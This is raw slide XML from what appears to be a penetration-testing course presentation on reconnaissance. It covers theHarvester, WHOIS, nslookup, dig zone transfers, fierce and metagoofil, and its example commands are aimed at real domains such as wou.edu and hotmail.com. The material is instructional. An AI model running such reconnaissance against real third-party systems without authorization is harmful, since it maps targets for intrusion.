        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143913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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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omputerhope.com/jargon/n/netmask.ht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7ThbeAMqkw"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youtube.com/watch?v=j-r5uFmuio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hyperlink" Target="http://www.metasploit.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fastandeasyhacking.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.offensive-security.com/metasploit-unleashed/Main_Pag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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Penetration Testing</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Reconnaissance Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Harvester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WHOIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Netcraft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NSLOOKUP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fierce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MetaGooFil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48119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Harvester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Search for email addresses related to a target host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>./theharvester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wou.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –l 10 –b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148143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4" descr="Screen shot 2015-02-16 at 7.22.1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53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45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Host</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Convert a target host name to an IP address or vice versa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wou.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ost 198.81.200.140</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28273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Screen shot 2015-02-16 at 7.28.4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78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51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WHOIS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provide a great deal of information about a target host/domain name, also from IP address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> terminal or a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wou.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>whois.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233338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Screen shot 2015-02-16 at 7.37.1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 y="0"/>
            <a:ext cx="8912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6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Screen shot 2015-02-16 at 7.39.0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70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Netcraft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Receive a huge amount of information about the target and sorted in the form of reports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>news.netcraft.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235092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Screen shot 2015-02-16 at 9.47.1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3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870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457200" y="457200"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="DDDDDD"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>What Does a Malicious Hacker Do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1600200"/>
            <a:ext cx="3733800" cy="4648200"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Active/Passive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Gaining Access:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161616"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Operating systems level/ application level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161616"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Network level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161616"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Denial of service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Maintaining Access:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161616"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Uploading/altering/downloading programs or data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Clearing Tracks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19459" name="Picture 4" descr="P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90725"/>
            <a:ext cx="4430713"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Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8001000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800" cmpd="dbl">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4947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NSLOOKUP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS information extraction tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;set type=any</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;server 65.55.37.62</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hotmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114981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Screen shot 2015-02-16 at 7.57.1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0"/>
            <a:ext cx="8118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841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Dig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perform zone transfer on DNS servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reveal all the hosts being supported by the DNS server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ig @65.55.37.62 –t AXFR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31747" name="Picture 3" descr="Screen shot 2015-02-16 at 8.15.0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546600"/>
            <a:ext cx="9144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49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Screen shot 2015-02-16 at 8.23.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513" y="0"/>
            <a:ext cx="8472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75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Fierce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find adjacent DNS servers for a zone transfer by brute forcing similar host names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fierce–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hotmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146377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Screen Shot 2016-01-31 at 5.02.1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0"/>
            <a:ext cx="86756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62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MetaGooFil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A metadata extraction tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used to search the internet for files belonging to a target host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metagoofil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wou.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –n 5 –o files –f results00.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285869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4" descr="Screen shot 2015-02-16 at 9.09.5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575" y="0"/>
            <a:ext cx="88534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10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descr="Screen shot 2015-02-16 at 9.08.1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3" y="0"/>
            <a:ext cx="84470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344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1603375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="zh-TW" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
